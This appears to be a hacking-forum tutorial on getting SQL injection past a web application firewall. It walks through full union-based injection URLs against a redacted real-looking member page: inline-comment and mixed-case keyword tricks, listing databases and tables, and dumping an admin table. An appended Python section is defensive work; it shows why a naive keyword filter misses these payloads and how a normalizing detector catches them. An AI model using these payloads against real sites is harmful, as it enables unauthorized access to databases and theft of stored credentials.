Once you run the Intruder tool it is time to sit back and interpret the results. You will need to check the time, length and grep columns, etc., and manually review any of the requests that show a noticeable variance in their responses.


Once you find one, re-test it manually in the browser to see if it works.

[Image: 89323078.png]

If it works, you are in; if not, keep analyzing and inspecting further.
[Image: 28104046.png]

Rinse, wash, and repeat as necessary.

WAF BYPASSING TECHNIQUES


I assume you know how to perform a union-based SQL injection; if not, check out my tutorial here:



Ok, let's get started.

You have found your SQLi-vulnerable site and worked out how many columns it has (in this case 62 xD).

You do the regular command:

Code:
http://www.****.org/members/member.php?id=-182 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62--

The website returns this error message:

[Image: tutorialmessage.jpg]

What you do now is wrap the blocked keywords in MySQL inline comments (/*!...*/, which the server still executes but a naive filter does not recognise), like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62--

And now the website returns this:

[Image: tutorialnumbers.jpg]

Ok, now we try to add version(), database() and user() in one line, like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,concat('join7+was+here',0x3a,version(),0x3a,user(),0x3a,database(),0x3a),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62--

The website returns this:

[Image: tutorialmessage.jpg]

Now we write "concat" in mixed upper and lower case letters, like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,CoNcAt('join7+was+here',0x3a,version(),0x3a,user(),0x3a,database(),0x3a),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62--

The website returns:

[Image: tutorialversion.jpg]

Now for the good part: let's try to find all the databases. Here is the regular syntax:

Code:
http://www.****.org/members/member.php?id=-182 UNION SELECT 1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62 from information_schema.schemata--

But with our new techniques the syntax would look like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,GrOuP_CoNcAt(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62 from information_schema.schemata--

The website returns:

[Image: tutorialdbs.jpg]

Now we would like to get the tables:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,Group_Concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62 from information_schema.tables where table_schema=database()--

The website returns:

[Image: tutorialmessage.jpg]

Now you have to hide information_schema (or tables) in the same way, by wrapping it in an inline comment, like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,Group_Concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62 from /*!information_schema*/.tables where table_schema=database()--

And this returns:

[Image: tutorialtables.jpg]

It's the same to get the columns; you know the drill.

If you now want to dump the id column from the admin table, do it like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,Group_Concat(id),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62 from admin--

Hope you learned something from my tutorial, feel free to ask if you have any questions.

REMEMBER: this is only BASIC WAF bypass; the techniques are endless.
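To see why the keyword filter this tutorial walks around fails, and what a detector has to do instead, here is an added example (not from the original post) that runs a naive case-sensitive rule set beside a normalizing detector over constructed requests shaped like the steps above; the `NAIVE_RULES` patterns are my assumption about the WAF, since the post never shows its configuration.

```python
import re
from urllib.parse import unquote_plus

# Constructed requests shaped like the steps of the tutorial above, with the
# long column lists shortened; "benign" is a normal page request.
REQUESTS = {
    "plain":       "id=-182 UNION SELECT 1,2,3,4--",
    "conditional": "id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,4--",
    "mixed_case":  "id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,CoNcAt(version(),0x3a,user()),5--",
    "schema":      "id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,Group_Concat(table_name),5"
                   " from /*!information_schema*/.tables where table_schema=database()--",
    "benign":      "id=182&sort=name",
}

# Assumed rule set for the tutorial's WAF (the post never shows its config):
# case-sensitive patterns applied to the raw query string.
NAIVE_RULES = [r"UNION\s+SELECT", r"concat\(", r"information_schema\.tables"]

def naive_blocklist(query):
    return any(re.search(rule, query) for rule in NAIVE_RULES)

def normalize(query):
    """Rewrite the request into the form MySQL will actually execute."""
    q = unquote_plus(query)
    # /*!...*/ is a MySQL conditional comment (optionally /*!50000...*/): the
    # server runs its body, so keep the body and drop only the delimiters.
    q = re.sub(r"/\*!\d*\s*(.*?)\*/", r"\1", q, flags=re.S)
    q = re.sub(r"/\*.*?\*/", " ", q, flags=re.S)   # ordinary comments are dropped
    q = re.sub(r"\s+", " ", q)                       # collapse whitespace
    return q.casefold()                              # CoNcAt -> concat

KEYWORDS = ("union", "select", "concat", "information_schema")

def normalized_detect(query):
    """Whole-word, case-insensitive keyword match on the canonical form."""
    q = normalize(query)
    return any(re.search(r"\b%s\b" % re.escape(k), q) for k in KEYWORDS)

if __name__ == "__main__":
    for name, q in REQUESTS.items():
        print(f"{name:12} naive={naive_blocklist(q)!s:5} normalized={normalized_detect(q)}")
```

The naive rules only flag the "plain" request, while the normalizer flags all four injected ones and leaves the benign request alone; even so, a normalizing filter is only a compensating control, and the query itself has to use bound parameters.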